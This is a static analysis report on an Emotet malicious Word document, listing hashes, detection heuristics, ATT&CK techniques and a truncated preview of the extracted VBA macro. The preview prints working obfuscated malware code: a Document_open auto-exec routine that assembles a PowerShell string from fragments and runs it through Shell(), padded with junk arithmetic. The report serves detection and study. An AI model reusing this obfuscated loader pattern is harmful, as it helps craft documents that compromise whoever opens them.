Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 98033e5dfd9275c4…

MALICIOUS

Office (OLE)

Size: 131.2 KB
Created: 2018-06-18 10:10:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 8da18d2b10a77c086b297265e28820d1
SHA-1: ccc6b3e7937629b4cb972c217bd8d210162cc31a
SHA-256: 98033e5dfd9275c4ccbc5273ecb8372325835dfa7a55bb565c14e704ca04b7df
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the auto-executing 'Document_Open' macro together indicate that the macros are designed to execute commands. The ClamAV detection explicitly names this as 'Doc.Downloader.Emotet-7067302-0', strongly suggesting the Emotet family. The VBA script attempts to construct and execute a PowerShell command (the string "OwerSH" is assembled at runtime from obfuscated fragments), likely to download and run a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7067302-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7067302-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19277 bytes
SHA-256: 26cca87ce32d209f022a87371691f0509f7503854fbf4d56bccd6e174e0ccc82

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "nADZFJiR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function QURDC()
On Error Resume Next
homTR = PESXW
zQciSj = 70406 / 50310
qijnlw = 68723 + 63397
GLVRPN = Atn(Nkhmz + Sin(fTEcO) - 28356 / 6289)
fUpRSl = MERaFa * CSng(23013 * Fix(54168)) * VNNzF + CSng(PiXCT + CLng(Djpzwz)) / (rIKswk * CSng(85648) - (10454 + Fix(uqPWE) - (46375 + CLng(kWhlY - Log(KtQRR) - 16701 + Int(cbIbk)))))
SLwLE = IjPUW
UXVcp = 95842 / 46637
aLdUvc = 2499 + 44942
jGDSF = Atn(watPuS + Sin(fswUu) - 80466 / 13455)
tMhzIu = mwdQnR * CSng(1668 * Fix(95268)) * COOpX + CSng(qjwXFw + CLng(XHjCU)) / (cFVIKW * CSng(34926) - (42496 + Fix(FCIKjJ) - (85543 + CLng(miazV - Log(Bkouc) - 46654 + Int(hkwNV)))))
kBWXJH = WLmFi
rjUQj = 1942 / 86304
aHVub = 53988 + 86132
tZJtT = Atn(MfVZj + Sin(jjffh) - 61219 / 2736)
lQCXOA = ihpQc * CSng(46117 * Fix(3898)) * DwHwTk + CSng(EZThi + CLng(BbANF)) / (nCJYzD * CSng(99918) - (49475 + Fix(ZEtBY) - (62087 + CLng(vUfZt - Log(LdEjW) - 97982 + Int(GpCXdO)))))
tzRBD = hsoZmE
nPCVB = 81555 / 56892
fIfzQ = 35090 + 95805
MmAwr = Atn(VnCKZ + Sin(MZwqHD) - 74219 / 13472)
JUrbzi = EsMSR * CSng(33319 * Fix(89604)) * DIwZK + CSng(UvaSE + CLng(XoQQi)) / (UbjiwK * CSng(48182) - (21569 + Fix(SZmQt) - (71865 + CLng(crTsnR - Log(ZRJuWp) - 31440 + Int(wjWwTm)))))
QURDC = IqANmZlVNk + Chr$(wuWuLu + 80 + wCnSB) + "OwerSH" + triZaKFA + EhMfihYGl + oESbIjbv + uEDutJMkNin + KYrLDkLlud
UOSNf = hrpUF
MVAzr = 3588 / 96130
GjzGEC = 99532 + 87973
oDEHu = Atn(qnhJPq + Sin(ftNhq) - 9350 / 86558)
sjfLZ = wdpMr * CSng(69395 * Fix(16146)) * HhIuO + CSng(SiACij + CLng(EPzndJ)) / (ElVrFL * CSng(87907) - (21735 + Fix(aMuwWp) - (47897 + CLng(IkvwOj - Log(dtqtOs) - 46427 + Int(adIWL)))))
IolNd = wIprA
ASEFtO = 34603 / 56306
pLjiXr = 85449 + 40591
isTMiN = Atn(RNDDB + Sin(iicTPU) - 1451 / 66015)
wRRSC = iEKCYs * CSng(39126 * Fix(25908)) * wcVLLW + CSng(VzGYBo + CLng(ZAJcG)) / (wBuds * CSng(97967) - (75917 + Fix(RhtVzm) - (64046 + CLng(VjJqDv - Log(Ldauh) - 71640 + Int(PPNpz)))))
End Function
Function iXMfslajjD(DjbckuznLR)
On Error Resume Next
rUHKn = SrOfj
AUGtOo = 3829 / 63020
aWssHY = 73788 + 93136
PEibJ = Atn(jXwVi + Sin(wSJHS) - 99488 / 6268)
UzNwrB = dTpzk * CSng(91959 * Fix(90866)) * DQAPX + CSng(fJhla + CLng(MMmqfj)) / (orYOl * CSng(22306) - (78138 + Fix(VBBNia) - (58542 + CLng(qXWZqo - Log(fNRFvQ) - 64524 + Int(UDmGWi)))))
vAtFaz = OczAH
QsuKsp = 41644 / 53987
pVkMtl = 63504 + 21461
wWOBJ = Atn(tjjmuo + Sin(wBiHa) - 85839 / 59110)
TGTmBv = oMVFzN * CSng(8129 * Fix(1723)) * MIKqQD + CSng(XtLwW + CLng(VCUVNX)) / (oYlNU * CSng(4367) - (3833 + Fix(azbRj) - (73376 + CLng(cWUfQm - Log(tqwcHr) - 35094 + Int(izjnln)))))
ABpoM = PNGccJcPr + Shell(qcTcNIpfq + DjbckuznLR + VtjYnLNb, 40671 - 40671)
zhlqiK = wcDzWX
LotozE = 70019 / 81551
pMDsm = 55493 + 34169
jSVmAB = Atn(hEOzbn + Sin(JjTHF) - 76932 / 30265)
MtJcf = TrRHXG * CSng(92029 * Fix(82487)) * uUXDQs + CSng(timBCh + CLng(zCsKM)) / (HkduTz * CSng(45491) - (21450 + Fix(cATwSI) - (46429 + CLng(ZBfPz - Log(pibmjR) - 8212 + Int(wjInKq)))))
End Function
Private Sub Document_open()
On Error Resume Next
YjlEP = oAYEdH
KAtwGF = 72330 / 93252
qQLnCo = 60558 + 9966
wsIWEO = Atn(NAVHI + Sin(DBFdP) - 24635 / 56300)
NqGht = EhwOj * CSng(3506 * Fix(88748)) * daWrI + CSng(kSWoDD + CLng(mQhCA)) / (fYzcdj * CSng(72957) - (47384 + Fix(AIniv) - (28390 + CLng(NjwWcS - Log(URdppR) - 32611 + Int(MjJPd)))))
XtLXV = iAZlj
cjuVPV = 57856 / 80449
HijON = 27193 + 13249
uMSqDQ = Atn(BjYhC + Sin(dRWwV) - 56217 / 70940)
tCzzn = OazIfR * CSng(92754 * Fix(93593)) * XznNQd + CSng(IzXtsK + CLng(srXpw)) / (ilFbuZ * CSng(49755) - (51603 + Fix(wqULHJ) - (29113 + CLng(AqcCt - Log(cuAEK) - 9676 + Int(IbzRw)))))
Application.Run CBPWwMXnV + "iXMfslajjD" + BoznzQ, GlrsLKwp + QURDC + WjioRw
wQzTKP = RKWuz
ITLMfJ = 79523 / 85985
vWTBEb = 99402 + 72223
LEWfTK = 
... (truncated)